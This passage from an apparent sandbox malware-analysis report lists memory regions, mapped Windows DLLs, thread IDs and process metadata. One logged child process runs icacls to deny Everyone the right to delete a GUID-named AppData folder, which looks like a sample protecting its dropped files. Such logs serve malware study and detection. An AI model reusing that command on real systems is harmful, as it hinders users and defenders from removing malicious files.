= "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 772 start_va = 0x7fefe680000 end_va = 0x7fefe7acfff monitored = 0 entry_point = 0x7fefe6ced50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 773 start_va = 0x7fefe7b0000 end_va = 0x7fefe88afff monitored = 0 entry_point = 0x7fefe7d0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 774 start_va = 0x7fefe890000 end_va = 0x7fefe900fff monitored = 0 entry_point = 0x7fefe8a1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 775 start_va = 0x7fefe910000 end_va = 0x7fefe9d8fff monitored = 0 entry_point = 0x7fefe98a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 776 start_va = 0x7fefea60000 end_va = 0x7fefeab1fff monitored = 0 entry_point = 0x7fefea610d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 777 start_va = 0x7fefeb60000 end_va = 0x7fefeb6dfff monitored = 0 entry_point = 0x7fefeb61080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 778 start_va = 0x7fefeb70000 end_va = 0x7fefec46fff monitored = 0 entry_point = 0x7fefeb73274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 779 start_va = 0x7fefec50000 end_va = 0x7fefec6efff monitored = 0 entry_point = 0x7fefec560e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 780 start_va = 0x7fefec70000 end_va = 0x7fefed0efff monitored = 0 entry_point = 0x7fefec725a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 781 start_va = 0x7fefed10000 end_va = 0x7fefee18fff monitored = 0 entry_point = 0x7fefed11064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 782 start_va = 0x7fefef50000 end_va = 0x7fefefe8fff monitored = 0 entry_point = 0x7fefef51c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 783 start_va = 0x7fefeff0000 end_va = 0x7fefeff7fff monitored = 0 entry_point = 0x7fefeff1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 784 start_va = 0x7feff000000 end_va = 0x7feff02dfff monitored = 0 entry_point = 0x7feff001010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 785 start_va = 0x7feff040000 end_va = 0x7feff040fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 786 start_va = 0x7fffff4c000 end_va = 0x7fffff4dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4c000" filename = "" Region: id = 787 start_va = 0x7fffff4e000 end_va = 0x7fffff4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4e000" filename = "" Region: id = 788 start_va = 0x7fffff50000 end_va = 0x7fffff51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff50000" filename = "" Region: id = 789 start_va = 0x7fffff52000 end_va = 0x7fffff53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff52000" filename = "" Region: id = 790 start_va = 0x7fffff54000 end_va = 0x7fffff55fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff54000" filename = "" Region: id = 791 start_va = 0x7fffff56000 end_va = 0x7fffff57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff56000" filename = "" Region: id = 792 start_va = 0x7fffff58000 end_va = 0x7fffff59fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 793 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 794 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 795 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 796 start_va = 0x7fffff60000 end_va = 0x7fffff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 797 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 798 start_va = 0x7fffff64000 end_va = 0x7fffff65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 799 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 800 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 801 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 802 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 803 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 804 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 805 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 806 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 807 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 808 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 809 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 810 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 811 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 812 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 813 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 814 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 815 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 816 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 817 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 818 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 819 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 820 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 821 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 822 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 823 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 824 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 825 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 826 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 827 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 828 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 829 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 830 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 831 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 832 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 833 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 834 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 835 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 836 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 837 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 838 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 839 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 840 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 841 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1129 start_va = 0x1370000 end_va = 0x1371fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 1331 start_va = 0x1370000 end_va = 0x137ffff monitored = 0 entry_point = 0x1373e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1332 start_va = 0x1380000 end_va = 0x1383fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 1333 start_va = 0x7fefad60000 end_va = 0x7fefad9efff monitored = 0 entry_point = 0x7fefad612c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1522 start_va = 0x24c0000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 1523 start_va = 0x7fefb780000 end_va = 0x7fefb794fff monitored = 0 entry_point = 0x7fefb781010 region_type = mapped_file name = "aelupsvc.dll" filename = "\\Windows\\System32\\aelupsvc.dll" (normalized: "c:\\windows\\system32\\aelupsvc.dll") Region: id = 1524 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1525 start_va = 0x5f00000 end_va = 0x607ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 1526 start_va = 0x2070000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 1527 start_va = 0x2c00000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 1528 start_va = 0x5f00000 end_va = 0x5ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 1529 start_va = 0x6070000 end_va = 0x607ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006070000" filename = "" Region: id = 1530 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1531 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1532 start_va = 0x7fef84b0000 end_va = 0x7fef8683fff monitored = 0 entry_point = 0x7fef84e6b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 1533 start_va = 0x6080000 end_va = 0x61affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1534 start_va = 0x61b0000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061b0000" filename = "" Region: id = 1535 start_va = 0x62c0000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 1536 start_va = 0x6500000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 1537 start_va = 0x1370000 end_va = 0x1370fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 1538 start_va = 0x1380000 end_va = 0x139ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 1539 start_va = 0x7fef87e0000 end_va = 0x7fef885bfff monitored = 0 entry_point = 0x7fef87e11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1540 start_va = 0x6900000 end_va = 0x6acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 1541 start_va = 0x13a0000 end_va = 0x13a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 1542 start_va = 0x1500000 end_va = 0x157ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 1543 start_va = 0x2490000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 1544 start_va = 0x6080000 end_va = 0x60fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1545 start_va = 0x6130000 end_va = 0x61affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006130000" filename = "" Region: id = 1546 start_va = 0x62c0000 end_va = 0x6369fff monitored = 0 entry_point = 0x62c4104 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1547 start_va = 0x6400000 end_va = 0x647ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 1548 start_va = 0x6480000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006480000" filename = "" Region: id = 1549 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 1550 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 1551 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 1552 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1553 start_va = 0x13b0000 end_va = 0x13bcfff monitored = 0 entry_point = 0x13ba138 region_type = mapped_file name = "wuauclt.exe" filename = "\\Windows\\System32\\wuauclt.exe" (normalized: "c:\\windows\\system32\\wuauclt.exe") Region: id = 1554 start_va = 0x6ad0000 end_va = 0x6d1efff monitored = 0 entry_point = 0x6ad236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1555 start_va = 0x13b0000 end_va = 0x13b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 1556 start_va = 0x13b0000 end_va = 0x13b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 1557 start_va = 0x13b0000 end_va = 0x13b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Thread: id = 9 os_tid = 0xe84 Thread: id = 10 os_tid = 0xe80 Thread: id = 11 os_tid = 0xe08 Thread: id = 12 os_tid = 0xe00 Thread: id = 13 os_tid = 0xdfc Thread: id = 14 os_tid = 0xd58 Thread: id = 15 os_tid = 0xd1c Thread: id = 16 os_tid = 0xc68 Thread: id = 17 os_tid = 0x840 Thread: id = 18 os_tid = 0x3b8 Thread: id = 19 os_tid = 0x330 Thread: id = 20 os_tid = 0x39c Thread: id = 21 os_tid = 0x310 Thread: id = 22 os_tid = 0x6b4 Thread: id = 23 os_tid = 0x74c Thread: id = 24 os_tid = 0x25c Thread: id = 25 os_tid = 0x1d8 Thread: id = 26 os_tid = 0x238 Thread: id = 27 os_tid = 0x7d4 Thread: id = 28 os_tid = 0x67c Thread: id = 29 os_tid = 0x7b8 Thread: id = 30 os_tid = 0x794 Thread: id = 31 os_tid = 0x244 Thread: id = 32 os_tid = 0x45c Thread: id = 33 os_tid = 0x628 Thread: id = 34 os_tid = 0x50c Thread: id = 35 os_tid = 0x7f4 Thread: id = 36 os_tid = 0x418 Thread: id = 37 os_tid = 0x2b0 Thread: id = 38 os_tid = 0x6d4 Thread: id = 39 os_tid = 0x6cc Thread: id = 40 os_tid = 0x6c4 Thread: id = 41 os_tid = 0x688 Thread: id = 42 os_tid = 0x668 Thread: id = 43 os_tid = 0x664 Thread: id = 44 os_tid = 0x63c Thread: id = 45 os_tid = 0x604 Thread: id = 46 os_tid = 0x600 Thread: id = 47 os_tid = 0x5dc Thread: id = 48 os_tid = 0x5cc Thread: id = 49 os_tid = 0x444 Thread: id = 50 os_tid = 0x440 Thread: id = 51 os_tid = 0x434 Thread: id = 52 os_tid = 0x42c Thread: id = 53 os_tid = 0x420 Thread: id = 54 os_tid = 0x214 Thread: id = 55 os_tid = 0x22c Thread: id = 56 os_tid = 0x3f4 Thread: id = 57 os_tid = 0x3ec Thread: id = 58 os_tid = 0x3e0 Thread: id = 59 os_tid = 0x384 Thread: id = 60 os_tid = 0x37c Thread: id = 61 os_tid = 0x374 Thread: id = 62 os_tid = 0x36c Thread: id = 112 os_tid = 0x4f4 Thread: id = 113 os_tid = 0xca8 Thread: id = 114 os_tid = 0x4ec Thread: id = 115 os_tid = 0x87c Thread: id = 116 os_tid = 0x88c Thread: id = 117 os_tid = 0x870 Thread: id = 118 os_tid = 0x86c Thread: id = 119 os_tid = 0xcb8 Thread: id = 120 os_tid = 0xcf4 Process: id = "4" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x4452c000" os_pid = "0xf10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xee8" cmd_line = "icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 845 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 846 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 847 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 848 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 849 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 850 start_va = 0x70000 end_va = 0xaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 851 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 852 start_va = 0xaa0000 end_va = 0xaa9fff monitored = 0 entry_point = 0xaa5489 region_type = mapped_file name = "icacls.exe" filename = "\\Windows\\SysWOW64\\icacls.exe" (normalized: "c:\\windows\\syswow64\\icacls.exe") Region: id = 853 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 854 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 855 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 856 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 857 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 858 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 859 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 860 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 861 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 862 start_va = 0x1d0000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 863 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 864 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 865 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 866 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 867 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 868 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 869 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 870 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 871 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 872 start_va = 0x440000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 873 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 874 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 875 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 876 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 877 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 878 start_va = 0xb0000 end_va = 0x116fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 879 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = 